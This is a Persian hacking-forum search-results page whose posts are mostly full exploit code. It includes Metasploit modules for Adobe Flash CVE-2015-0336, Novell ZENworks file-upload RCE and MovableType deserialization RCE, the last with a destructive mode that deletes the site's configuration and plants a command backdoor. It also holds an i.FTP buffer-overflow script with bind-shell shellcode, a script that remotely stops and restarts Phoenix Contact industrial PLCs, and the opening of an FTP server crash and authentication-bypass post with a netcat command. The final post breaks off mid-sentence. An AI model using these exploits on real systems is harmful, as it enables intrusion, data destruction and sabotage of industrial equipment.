امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

807 نتیجه پیدا شد

  1. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player NetConnection Type Confusion', 'Description' => %q{ This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305. }, 'License' => MSF_LICENSE, 'Author' => [ 'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-0336'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'], ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'], ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 12 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @trigger = create_trigger super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) trigger_hex_stream = @trigger.unpack('H*')[0] html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_trigger path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  3. mohammad_ghazei

    Hacking

    #!/usr/bin/python # Exploit Title : i.FTP 2.21 Time Field SEH Exploit # Exploit Author : Revin Hadi S # Vulnerability PoC : Avinash Kumar Thapa "-Acid" # PoC Link : https://www.exploit-db.com/exploits/36847/ # Date : 05/08/2015 # Vendor : http://www.memecode.com/iftp.php # Software Link : http://www.memecode.com/data/iftp-win32-v2.21.exe # Version : 2.21 # Tested On : Win 7 SP1 Eng & Win XP SP2 # Triggering Exploit : Go to Schedule > Schedule download > {+} >Time field # msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_upper BufferRegister=EAX -t c shellcode = ("\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56" "\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30" "\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b" "\x4c\x4a\x48\x4c\x49\x33\x30\x53\x30\x53\x30\x35\x30\x4b\x39" "\x4a\x45\x30\x31\x4e\x32\x55\x34\x4c\x4b\x31\x42\x46\x50\x4c" "\x4b\x51\x42\x54\x4c\x4c\x4b\x46\x32\x35\x44\x4c\x4b\x54\x32" "\x57\x58\x54\x4f\x38\x37\x31\x5a\x31\x36\x50\x31\x4b\x4f\x36" "\x51\x59\x50\x4e\x4c\x47\x4c\x53\x51\x53\x4c\x44\x42\x56\x4c" "\x47\x50\x49\x51\x48\x4f\x54\x4d\x43\x31\x39\x57\x4d\x32\x4a" "\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x34\x50\x4c\x4b\x51\x52" "\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x51\x50\x54\x38\x4d\x55\x39" "\x50\x32\x54\x50\x4a\x45\x51\x58\x50\x56\x30\x4c\x4b\x50\x48" "\x44\x58\x4c\x4b\x36\x38\x47\x50\x33\x31\x48\x53\x5a\x43\x47" "\x4c\x30\x49\x4c\x4b\x36\x54\x4c\x4b\x33\x31\x38\x56\x46\x51" "\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x38\x4f\x44\x4d\x55" "\x51\x48\x47\x46\x58\x4d\x30\x33\x45\x4b\x44\x44\x43\x53\x4d" "\x4a\x58\x47\x4b\x43\x4d\x47\x54\x54\x35\x5a\x42\x30\x58\x4c" "\x4b\x31\x48\x51\x34\x53\x31\x49\x43\x52\x46\x4c\x4b\x44\x4c" "\x30\x4b\x4c\x4b\x36\x38\x45\x4c\x55\x51\x4e\x33\x4c\x4b\x55" "\x54\x4c\x4b\x43\x31\x38\x50\x4b\x39\x57\x34\x37\x54\x37\x54" "\x31\x4b\x51\x4b\x53\x51\x51\x49\x51\x4a\x46\x31\x4b\x4f\x4d" "\x30\x31\x48\x51\x4f\x31\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x46" "\x31\x4d\x33\x58\x46\x53\x47\x42\x43\x30\x43\x30\x43\x58\x52" "\x57\x42\x53\x36\x52\x31\x4f\x50\x54\x43\x58\x30\x4c\x52\x57" "\x51\x36\x43\x37\x4b\x4f\x4e\x35\x38\x38\x4c\x50\x55\x51\x33" "\x30\x35\x50\x46\x49\x4f\x34\x36\x34\x36\x30\x52\x48\x57\x59" "\x4d\x50\x52\x4b\x53\x30\x4b\x4f\x58\x55\x46\x30\x50\x50\x36" "\x30\x30\x50\x31\x50\x46\x30\x31\x50\x50\x50\x35\x38\x4b\x5a" "\x44\x4f\x39\x4f\x4d\x30\x4b\x4f\x39\x45\x4c\x49\x48\x47\x50" "\x31\x49\x4b\x46\x33\x52\x48\x43\x32\x55\x50\x32\x36\x50\x42" "\x4c\x49\x4b\x56\x52\x4a\x52\x30\x36\x36\x31\x47\x43\x58\x39" "\x52\x59\x4b\x57\x47\x32\x47\x4b\x4f\x39\x45\x50\x53\x46\x37" "\x32\x48\x38\x37\x4b\x59\x56\x58\x4b\x4f\x4b\x4f\x39\x45\x31" "\x43\x51\x43\x30\x57\x35\x38\x33\x44\x5a\x4c\x57\x4b\x4b\x51" "\x4b\x4f\x49\x45\x51\x47\x4c\x49\x4f\x37\x33\x58\x33\x45\x42" "\x4e\x50\x4d\x33\x51\x4b\x4f\x59\x45\x32\x48\x32\x43\x42\x4d" "\x52\x44\x43\x30\x4c\x49\x5a\x43\x46\x37\x51\x47\x31\x47\x30" "\x31\x4a\x56\x52\x4a\x34\x52\x50\x59\x31\x46\x4a\x42\x4b\x4d" "\x53\x56\x39\x57\x57\x34\x31\x34\x47\x4c\x53\x31\x55\x51\x4c" "\x4d\x31\x54\x46\x44\x52\x30\x38\x46\x55\x50\x51\x54\x46\x34" "\x30\x50\x30\x56\x36\x36\x46\x36\x50\x46\x31\x46\x50\x4e\x56" "\x36\x46\x36\x50\x53\x30\x56\x55\x38\x53\x49\x58\x4c\x37\x4f" "\x4c\x46\x4b\x4f\x59\x45\x4d\x59\x4b\x50\x50\x4e\x46\x36\x50" "\x46\x4b\x4f\x50\x30\x53\x58\x43\x38\x4d\x57\x45\x4d\x35\x30" "\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x58\x35\x39\x32\x56\x36\x33" "\x58\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x37\x4c" "\x35\x56\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x33\x45\x44" "\x45\x4f\x4b\x47\x37\x42\x33\x32\x52\x52\x4f\x52\x4a\x35\x50" "\x31\x43\x4b\x4f\x39\x45\x41\x41") # Align Shellcode to EAX register align = "\x58"*3 # POP EAX; POP EAX; POP EAX align += "\x2d\x77\x77\x77\x77" # SUB EAX, 0x77777777 align += "\x2d\x77\x33\x33\x33" # SUB EAX, 0x33333377 align += "\x2d\x77\x22\x22\x22" # SUB EAX, 0x22222277 align += "\x2d\x3b\x32\x33\x33" # SUB EAX, 0x3333323b buffer = "A"*300 buffer += "\x40\x75\x21\x40" buffer += "\x67\x59\x02\x10" # /p/p/r Lgi.dll buffer += "DOGE"*7 buffer += align buffer += "\x43"*37 buffer += shellcode f = open("evil.txt", "wb") f.write(buffer) f.close()
  4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'SixApart MovableType Storable Perl Code Execution', 'Description' => %q{ This module exploits a serialization flaw in MovableType before 5.2.12 to execute arbitrary code. The default nondestructive mode depends on the target server having the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. The destructive mode of operation uses only required MovableType dependencies, but it will noticeably corrupt the MovableType installation. }, 'Author' => [ 'John Lightsey', ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-1592' ], [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ], ], 'Privileged' => false, # web server context 'Payload' => { 'DisableNops' => true, 'BadChars' => ' ', 'Space' => 1024, }, 'Compat' => { 'PayloadType' => 'cmd' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 11 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']), OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]) ], self.class ) end =begin #!/usr/bin/perl # generate config parameters for injection checks use Storable; { package XXXCHECKXXX; sub STORABLE_thaw { return 1; } sub STORABLE_freeze { return 1; } } my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj}); $frozen = unpack 'H*', $frozen; print "LFI test for storable flaw is: $frozen\n"; { package DateTime; use overload '+' => sub { 'ignored' }; } =end def check vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078' } }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit if datastore['DESTRUCTIVE'] == true exploit_destructive else exploit_nondestructive end end =begin #!/usr/bin/perl # Generate nondestructive config parameter for RCE via Object::MultiType # and Try::Tiny. The generated value requires minor modification to insert # the payload inside the system() call and resize the padding. use Storable; { package Object::MultiType; use overload '+' => sub { 'ingored' }; } { package Object::MultiType::Saver; } { package DateTime; use overload '+' => sub { 'ingored' }; } { package Try::Tiny::ScopeGuard; } my $try_tiny_loader = bless {}, 'DateTime'; my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver'; my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType'; my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard'; my $data = [$try_tiny_loader, $try_tiny_executor]; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); $frozen = unpack 'H*', $frozen; print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive print_status("#{peer} - Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => config_payload } }, 5) end =begin #!/usr/bin/perl # Generate destructive config parameter to unlink mt-config.cgi use Storable; { package CGITempFile; } my $unlink_target = "mt-config.cgi"; my $cgitempfile = bless \$unlink_target, "CGITempFile"; my $data = [$cgitempfile]; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); $frozen = unpack 'H*', $frozen; print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive print_status("#{peer} - Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769' } }) if res && res.code == 200 print_status("Successfully sent unlink request") else fail_with(Failure::Unknown, "Error sending unlink request") end # Now we rewrite mt-config.cgi to accept a payload print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'next_step', 'step' => 'optional', 'default_language' => 'en_us', 'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1", 'set_static_uri_to' => '/', 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/', } }) if res && res.code == 200 print_status("Successfully sent mt-config rewrite request") else fail_with(Failure::Unknown, "Error sending mt-config rewrite request") end # Finally send the payload print_status("#{peer} - Sending payload request") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt.cgi'), 'vars_get' => { 'xyzzy' => payload.encoded, } }, 5) end end
  5. mohammad_ghazei

    Hacking

    #! /usr/bin/env python ''' # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script # Date: 2015-05-19 # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be # Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330 # Version: ALL FW VERSIONS # Tested on: Python runs on Windows, Linux # CVE : CVE-2014-9195 Copyright 2015 Photubias(c) Written for Howest(c) University College This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name ControlPLC.py written by tijl[dot]deneut[at]howest[dot]be This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x ''' import sys, socket, binascii, time, os, select, re IP='' infoport=1962 controlport=41100 ## Defining Functions First def send_and_recv(s,size,strdata): data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...) s.send(data) ret = s.recv(4096) return ret def doAction(s,strdata): ret = send_and_recv(s,1000,strdata) # In official state these are send, they do not seem to be needed send_and_recv(s,1000,packet1) send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ret = send_and_recv(s,1000,'010002000000020003000100000000000840') send_and_recv(s,1000,packet2) return ret def initMonitor(s): send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200') send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200') send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500') send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500') send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200') send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200') return def is_ipv4(ip): match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip) if not match: return False quad = [] for number in match.groups(): quad.append(int(number)) if quad[0] < 1: return False for number in quad: if number > 255 or number < 0: return False return True ##### The Actual Program if not len(sys.argv) == 2: IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ") else: IP = sys.argv[1] if not is_ipv4(IP): print "Please go read RFC 791 and then use a legitimate IPv4 address." sys.exit() ## - initialization, this will get the PLC type, Firmware version, build date & time s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,infoport)) print 'Initializing PLC' print '----------------' code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36] send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000') ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400') print 'PLC Type = ' + ret[30:50] print 'Firmware = ' + ret[66:70] print 'Build = ' + ret[79:100] send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000') send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400') send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000') send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400') send_and_recv(s,1000,'0102000c006bffffff0f00' + code) s.shutdown(socket.SHUT_RDWR) s.close() print 'Initialization done' print '-------------------\r\n' print 'Will now print the PLC state and reverse it after 3 seconds' raw_input('Press [Enter] to continue') ########## CONTROL PHASE ####### Start monitoring with loop on port 41100 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,controlport)) # First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets) initMonitor(s) # Query packet packet1 = '010002000000080003000300000000000200000002400b40' # Keepalive packet packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600' ## The loop keepalive and query status loop (2 x keepalive, one time query): i = 0 state = 'On' running = 0 stopme = 0 startme = 0 while True: i += 1 time.sleep(0.1) ## Keep Alive send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ## Possible actions (like stop/start) should be sent now before the query state if (state == 'Running' and stopme): print 'Sending Stop' doAction(s,'01000200000000000100070000000000') startme = stopme = 0 elif (state == 'Stop' and startme): print 'Sending COLD Start' ## This is the COLD start: doAction(s,'010002000000020001000600000000000100') ## This is the WARM start: doAction(s,'010002000000020001000600000000000200') ## This is the HOT start: doAction(s,'010002000000020001000600000000000300') doAction(s,'010002000000020001000600000000000100') startme = stopme = 0 ## Query Status ret = send_and_recv(s,1000,packet1).encode('hex') if ret[48:50] == '03': state = 'Running' elif ret[48:50] == '07': state = 'Stop' elif ret[48:50] == '00': state = 'On' else: print 'State unknown, found code: '+ret.encode('hex')[48:50] print 'Current PLC state: '+state ## Maintaining the LOOP if i == 50: break # ''' if i == 30: if state == 'Running': stopme = 1 else: startme = 1 #''' raw_input('All done, press [Enter] to exit')
  6. #!/usr/bin/env python #================================================================================== # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service # Date: 2015-05-25 # Exploit Author: Wh1t3Rh1n0 (Michael Allen) # Exploit Author's Homepage: http://www.mikeallen.org # Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302 # Version: 3.0 # Tested on: iPhone #================================================================================== # ------------------ # Denial of Service: # ------------------ # The FTP server does not properly handle errors raised by invalid # FTP commands. The following command, which sends an invalid PORT command to # the FTP server, will crash the server once it is received. # echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000 # ---------------------- # Authentication Bypass: # ---------------------- # The FTP server does not handle unauthenticated connections or incorrect login # credentials properly. A remote user can issue commands to the FTP server # without authenticating or after entering incorrect credentials. # The 